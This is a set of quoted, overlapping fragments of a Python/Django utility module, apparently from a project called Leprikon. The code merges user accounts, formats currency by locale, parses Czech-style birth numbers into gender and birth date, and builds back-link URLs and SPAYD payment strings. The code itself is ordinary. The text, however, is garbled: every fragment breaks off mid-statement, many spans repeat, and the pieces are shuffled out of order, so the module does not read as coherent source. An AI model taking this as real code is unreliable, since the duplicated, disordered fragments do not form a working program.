"if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user =",
"non integer values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) +",
"merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in",
"birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year",
"merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\"))",
"target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if",
"+ \")\" elif sign_pos == 1: s = sign + s elif sign_pos",
"if precedes: s = smb + (separated and \" \" or \"\") +",
"100) * 100 + y if y > date.today().year % 100: year -=",
"= \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during",
"if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or",
"target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target,",
"and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"]",
"target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError:",
"mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass",
"tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for",
"reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1]",
"be inserted between symbol and value s = \"<\" + s + \">\"",
"smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must",
"try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse",
"return lc localeconv = _get_localeconv() # This function is inspired by python's standard",
"smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val",
"localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb +",
"sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos == 4:",
"target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined",
"zlib from datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import",
"1954 if y < 54: year = 1900 + y else: year =",
"y if y > date.today().year % 100: year -= 100 month = int(birth_num[2:4])",
"0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def",
"precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val <",
"pass else: try: # try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0]",
"loads localeconv during module load. It is necessary, because using locale.setlocale later may",
"load. It is necessary, because using locale.setlocale later may be dangerous (It is",
"localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s =",
"or [f.name for f in source._meta.fields if f.name not in exclude] for attr",
"function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according",
"urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction",
"target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user",
"\"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph =",
"+ string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in",
"exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if",
"> today: return today.year - birth_date.year - 1 else: return today.year - birth_date.year",
"\"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign",
"smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy",
"mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import",
"digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s = str(abs(int(val))) for interval",
"target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login",
"KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK:",
"source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save()",
"today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError:",
"pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\"",
"+ \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in",
"< 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\"",
"not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name =",
"str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This",
"settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads",
"unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2:",
"= 1800 + y else: year = int(date.today().year / 100) * 100 +",
"and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"]",
"\"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp =",
"= target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user",
"be dangerous (It is not thread-safe in most of the implementations.) \"\"\" original_locale_name",
"return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def",
"except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for attr",
"import locale import os import re import string import unicodedata import zlib from",
"def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if",
"get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in [ord(x) for",
"or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else",
"for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: #",
"import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy",
"locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the currency settings for current",
"% 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today",
"len(stringset)] for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]:",
"source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save() except",
"RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" %",
"else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), )",
"s.replace(\">\", sign) else: # the default if nothing specified; # this should be",
"date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50 % 20",
"def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if",
"% 50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date,",
"val according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES #",
"default if nothing specified; # this should be the most fitting sign position",
"os import re import string import unicodedata import zlib from datetime import date",
"django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from",
"ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse from",
"this should be the most fitting sign position s = sign + s",
"if f.name not in exclude] for attr in attributes: if not getattr(target, attr):",
"return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text,",
"import unicodedata import zlib from datetime import date from urllib.parse import parse_qs, urlencode",
"MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv",
"* 100 + y if y > date.today().year % 100: year -= 100",
"+ s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount >",
"sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign = localeconv[val <",
"for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp,",
"= [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break",
"return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter",
"\" \" or \"\") + s else: s = s + (separated and",
"or target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist:",
".models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = (",
"recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args,",
"sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient =",
"= str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s =",
"def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\",",
"try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass #",
"amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE",
"elif sign_pos == 4: s = s.replace(\">\", sign) else: # the default if",
"2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def",
"+ sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos ==",
"else: year = 1800 + y else: year = int(date.today().year / 100) *",
"# display fraction for non integer values if digits and not isinstance(val, int):",
"source._meta.fields if f.name not in exclude] for attr in attributes: if not getattr(target,",
"source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\"))",
"= attributes or [f.name for f in source._meta.fields if f.name not in exclude]",
"not in exclude] for attr in attributes: if not getattr(target, attr): setattr(target, attr,",
"if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target",
"the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups =",
"return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source,",
"s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values",
"\"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module",
"unicodedata import zlib from datetime import date from urllib.parse import parse_qs, urlencode from",
"current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num):",
"MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) ==",
"most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\"",
"len(birth_num) == 9: # before 1954 if y < 54: year = 1900",
"20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today =",
"separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s =",
"\"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in",
"tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else:",
"= sign + s elif sign_pos == 2: s = s + sign",
"are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\",",
"max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader",
"grouping groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not",
"1) if birth_day_this_year > today: return today.year - birth_date.year - 1 else: return",
"mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE =",
"iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import",
"django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy as",
"values if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] #",
"# remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def",
"lc localeconv = _get_localeconv() # This function is inspired by python's standard locale.currency().",
"+ \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign must be",
"# '<' and '>' are markers if the sign must be inserted between",
"\"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if",
"\"\") y = int(birth_num[:2]) if len(birth_num) == 9: # before 1954 if y",
"54: year = 1900 + y else: year = 1800 + y else:",
"= _get_localeconv() # This function is inspired by python's standard locale.currency(). def currency(val,",
"try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError:",
"inserted between symbol and value s = \"<\" + s + \">\" smb",
"else: # the default if nothing specified; # this should be the most",
"return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]):",
"sign_pos == 4: s = s.replace(\">\", sign) else: # the default if nothing",
"locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired by",
"back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs):",
"if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else:",
"groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for non integer values if",
"lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return",
"in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic",
"\"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp =",
"int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def",
"social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete()",
"= target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp:",
"tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first()",
"sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\",",
"implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc",
"locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired",
"\").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i in",
"break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) #",
"% zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph = lazy(paragraph,",
"and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for i",
"\"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or",
"precedes: s = smb + (separated and \" \" or \"\") + s",
"position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def",
"= recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs),",
"should be the most fitting sign position s = sign + s return",
"sign_pos == 1: s = sign + s elif sign_pos == 2: s",
"IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text",
"This function is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val",
"as _ from .conf import settings MALE = \"m\" FEMALE = \"f\" def",
"original_locale_name) return lc localeconv = _get_localeconv() # This function is inspired by python's",
"\"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val",
"pass except IntegrityError: # both users are leaders raise for attr in (",
"the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name))",
"if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target",
"interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s:",
"settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s",
"+= smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if the sign",
"locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name)",
"return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def",
"except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s",
"\", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount <",
"if len(birth_num) == 9: # before 1954 if y < 54: year =",
"0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or",
"or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes:",
") recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError:",
"settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try:",
"locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv() #",
"in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"])",
"It is necessary, because using locale.setlocale later may be dangerous (It is not",
"= int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year, month, day)",
"not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target) except",
"tbi: tbi = merge_objects(sbi, tbi, exclude=(\"id\", \"user\")) tbi.save() else: sbi.user = target sbi.save()",
"exclude=[]): attributes = attributes or [f.name for f in source._meta.fields if f.name not",
"\"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if",
"100: year -= 100 month = int(birth_num[2:4]) % 50 % 20 day =",
"import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined,",
"s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes",
"# support social auth source.social_auth.update(user=target) except AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source,",
"date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month",
"in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def",
"today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except",
"= merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi",
"< 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\")",
"request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ),",
"import re import string import unicodedata import zlib from datetime import date from",
"not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are",
"for i in [ord(x) for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return",
"sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try:",
"before 1954 if y < 54: year = 1900 + y else: year",
"3: s = s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign)",
"sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0:",
"(\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else",
"most fitting sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\"",
"(separated and \" \" or \"\") + smb sign_pos = localeconv[val < 0",
"today.year - birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return",
"= locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc",
"[f.name for f in source._meta.fields if f.name not in exclude] for attr in",
"if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK,",
"+ y else: year = 1800 + y else: year = int(date.today().year /",
"< 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\"",
"if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support social auth source.social_auth.update(user=target)",
"if birth_day_this_year > today: return today.year - birth_date.year - 1 else: return today.year",
"= \"(\" + s + \")\" elif sign_pos == 1: s = sign",
".rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join(",
") target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or",
"comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\",",
"RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k,",
"merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp",
"source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users",
"= locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL,",
") try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except",
"not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s =",
"currency(val, international=False): \"\"\"Formats val according to the currency settings for current language.\"\"\" digits",
"tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save()",
"\"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v",
"import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db",
"sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi:",
"recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass",
"else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i %",
"\".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return",
"= ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login )",
"birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper() +",
"= url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse original back",
"url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request, *args, **kwargs): return",
"\"p_cs_precedes\"] separated = localeconv[val < 0 and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s",
"( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for",
"import mark_safe from django.utils.translation import ugettext_lazy as _ from .conf import settings MALE",
"or \"p_sign_posn\"] sign = localeconv[val < 0 and \"negative_sign\" or \"positive_sign\"] if sign_pos",
"except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today:",
"AttributeError: pass from .rocketchat import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s =",
"is not thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name",
"_(\", and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters",
"ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE = \"f\"",
"= date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1)",
"date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if",
"(k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s +=",
